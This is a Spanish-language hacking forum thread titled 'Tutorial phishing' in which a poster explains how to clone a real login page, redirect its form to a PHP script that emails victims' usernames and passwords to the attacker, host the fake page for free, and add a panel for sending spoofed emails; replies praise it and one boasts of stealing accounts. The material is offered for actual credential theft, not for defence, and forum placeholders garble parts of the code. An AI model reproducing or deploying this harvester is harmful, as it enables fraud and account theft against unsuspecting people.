comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Tutorial phishing

  • 22 Respuestas
  • 19502 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Noviembre 12, 2014, 08:18:37 am »
Buenos dias/tardes/noches.

Os traigo un pequeño tutorial de como hacer phishing, aclaro que he seleccionado una pagina aleatoria.

Lo primero es irnos a la contraseña y darle a inspeccionar elemento.



Buscamos el form y le añadimos un action="scam.php"



Copiamos el codigo html en un archivo html y con codificacion UFT-8

En la misma carpeta donde tenemos el archivo html creamos un php con el siguiente codigo (en UFT-8 tambien):

Código: PHP
  1. <?php
  2.  
  3. $user = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['el name del input del user']);
  4. $password = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['el name del input de pass']);
  5.  
  6. $correoreceptor = "aquí cámbialo y pon tu correo";
  7. $asunto = "Ha caido una nueva víctima";
  8. $mensaje = "Usuario: ".$user."  -  Contraseña: ".$password;
  9.  
  10. No tienes permisos para ver links. Registrate o Entra con tu cuenta($correoreceptor, $asunto, $mensaje);
  11. No tienes permisos para ver links. Registrate o Entra con tu cuenta('Location: Pagina real');
  12.  
  13. ?>

Ya solo hace falta buscar un host gratis y subirlo todo

Asi quedaria la pagina falsa



Y nos mandaria todos los logs a nuestro correo electronico :)

EDITO

He tenido varios problemas de los cuales solo aviso y no voy a explicar como librarse.

1º css en archivo en lugar de en html, tendreis que descargarlo para que la pagina quede exactamente igual.

2º script para impedir escribir en <input name="password"> en caso de estar en otra web, tendreis que borrar el script.

EDITO

Voy a explicar como hacer un panel para que mande un correo a donde tu quieras (Se suele usar mucho en el phishing)

lo primero es el codigo html al que llamaremos index.html

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  4. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  5. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  6. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Phishing Pagina</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  7. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Correo al que desea enviar el email:</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  8. <No tienes permisos para ver links. Registrate o Entra con tu cuenta action="correof.php" method="post">
  9. <No tienes permisos para ver links. Registrate o Entra con tu cuenta name="correof" type="text">
  10. <No tienes permisos para ver links. Registrate o Entra con tu cuenta type="submit">Enviar</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  11. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  12. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  13. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  14. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>

Creamos un .php con este codigo (se llamara correof):

Código: PHP
  1. <?php
  2.  
  3. $correoreceptor = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['correof']);
  4. $asunto = "Asunto del correo";
  5. $mensaje = 'Codigo html del cuerpo';
  6. $cabeceras  = 'MIME-Version: 1.0' . "\r\n";
  7. $cabeceras .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  8. $cabeceras .= 'From: Nombre del que se envia <Correo del que se envia>' . "\r\n";
  9.  
  10. No tienes permisos para ver links. Registrate o Entra con tu cuenta($correoreceptor, $asunto, $mensaje, $cabeceras);
  11.  
  12.  
  13.  
  14. ?>

También me pueden seguir en Twitter si les hace ilusión: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Saludos
« Última modificación: Abril 01, 2018, 10:23:34 am por rollth »

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Y3K

  • *
  • Underc0der
  • Mensajes: 173
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Noviembre 12, 2014, 10:23:58 pm »
Gracias por el tutorial.

Sencillo pero más de uno caerá en algo así.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #2 en: Noviembre 16, 2014, 04:09:51 am »
buen post, algo por donde comenzar.

Desconectado NyxKazuya

  • *
  • Underc0der
  • Mensajes: 55
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Noviembre 17, 2014, 12:32:21 pm »
Toda una pasada el code si que esta bueno :D gracias

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 284
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Noviembre 19, 2014, 07:11:21 pm »
genial bro, sencillo, rapido y eficaz, estupendo trabajo, gracias por compartirlo, saludos

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #5 en: Enero 01, 2015, 03:43:56 pm »
Modificado explicando como hacer un panel.

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado GangsteR

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
  • No por el echo a errar... vas a dejar de Programar
    • Ver Perfil
    • El Club de los Programadores
« Respuesta #6 en: Enero 13, 2015, 09:07:55 pm »
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #7 en: Enero 13, 2015, 10:15:32 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)

Intente explicar de forma que cualquier persona que no sepa entendiera, si tienes algun problema contactame.

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado xrahiel

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Enero 21, 2015, 08:46:00 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #9 en: Enero 21, 2015, 10:07:25 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hubiera sido bueno un vídeo para los novatos.

Pero de todas maneras excelente  8)
;)

No creo que a la gente les sea muy util si no compartes el run.bat

Otra cosa es que en lugar de direccionar a forbiden 403 podrias redireccionar a la pagina real para que crea que ha sido un error y entonces entre normalmente.

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    3.33%
  • Reputación 0
  • Éxito o fracaso, libertad o condena.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« Respuesta #10 en: Enero 29, 2015, 07:19:55 pm »
Mira por donde va a haber un segundo Facebook jajaja excelente tutorial. ]

Enviado desde mi LG-E400 usando Tapatalk 2


Desconectado kR4N30

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • ACAB
    • Ver Perfil
  • Skype: rafamarleey
« Respuesta #11 en: Marzo 30, 2015, 08:51:19 pm »
Gracias bro, simple pero más de uno cae, saludos.
El unico pez que nada con la corriente, es el pez muerto.

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #12 en: Marzo 31, 2015, 02:39:00 am »
Buena info.! esa es la idea básica de un Scam, el resto es pura imaginación...
« Última modificación: Enero 17, 2016, 10:40:43 pm por EPSILON »

Desconectado Banfek

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: mod-guntest
  • Twitter: Banfek
« Respuesta #13 en: Abril 01, 2015, 02:29:31 pm »
Muy buen aporte!
¿Alguien podría decirme algún host gratuito recomendable?

Saludos.

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    3.33%
  • Reputación 0
  • Éxito o fracaso, libertad o condena.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« Respuesta #14 en: Abril 02, 2015, 09:48:54 am »
Yo el año pasado me pasaba el dia haciendo esto jajaja. Estos fakes son muy útiles para robarte unas cuentas.

Desconectado Xlitec0d3

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #15 en: Noviembre 25, 2015, 06:15:08 pm »
Yo tengo hecho un panel para enviar emails: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Tiene contraseña, que es... : Underc0deano

Si lo se... original.
Provadlo y me decis.
: D
« Última modificación: Noviembre 25, 2015, 06:16:54 pm por Xlitec0d3 »

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #16 en: Noviembre 25, 2015, 08:33:11 pm »
Bueno, mas que un panel de control para phishing es un fake email :D

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado eliasacero

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: superhack2020
« Respuesta #17 en: Junio 17, 2016, 03:32:24 pm »
hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto

Conectado Gabriela

  • *
  • Co Admin
  • Mensajes: 873
  • Actividad:
    6.67%
  • Reputación 15
    • Ver Perfil
    • Email
« Respuesta #18 en: Junio 17, 2016, 03:56:30 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
hola amigos soy nuevo en este grupo pero empiezo así  tengo scrips de phishing el cual aceptan solo cualquiera no verdaderos pero e visto que hay scrip de phishing que solo aceptan veradaderos como seria para configurarlos espero que respondan pronto

Por favor,edita tu post y redacta un texto que se entienda, qué es lo que tienes y qué quieres. El foro tiene corrector ortográfico también.
Es casi ilegible/incomprensible lo que has escrito.

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Gracias

Gabriela

Desconectado NuMB3RW4N

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 1
  • El Conocimiento Es Un Gran Placer De La Vida
    • Ver Perfil
    • Email
« Respuesta #19 en: Agosto 21, 2016, 06:12:54 am »
hola buenas estos phishing   

¿son detectados  por google chrome como pagina maliciosa?

no tendría ningún sentido hacer lo pasos  lograr montarlo en un servidor gratuito
para que al final cuando se lo envíes ala victima salga pagina maliciosa
ya que ninguna persona caería en la trampa 

 

¿Te gustó el post? COMPARTILO!



Tutorial - "Recuperar datos borrados dispositivo almacenamiento"

Iniciado por Cl0udswX

Respuestas: 7
Vistas: 4239
Último mensaje Octubre 22, 2017, 04:27:09 pm
por b4r7
Breve Tutorial Sobre Ingenieria Social + Algunos Ejemplos

Iniciado por Krau[Z]ereth

Respuestas: 2
Vistas: 5122
Último mensaje Junio 28, 2012, 04:04:06 am
por aura16
Utilizando BeEF-XSS Framework-Tutorial Español - Backtrack 5 R3

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 4711
Último mensaje Febrero 02, 2013, 09:02:37 pm
por Aryenal.Bt
Super tutorial de comandos MS-DOS(segunda parte) by k43l

Iniciado por k43l

Respuestas: 2
Vistas: 2686
Último mensaje Abril 06, 2010, 10:56:34 am
por k43l
Super tutorial de comandos MS-DOS(primera parte) by k43l

Iniciado por k43l

Respuestas: 6
Vistas: 4462
Último mensaje Abril 07, 2010, 09:35:17 pm
por k43l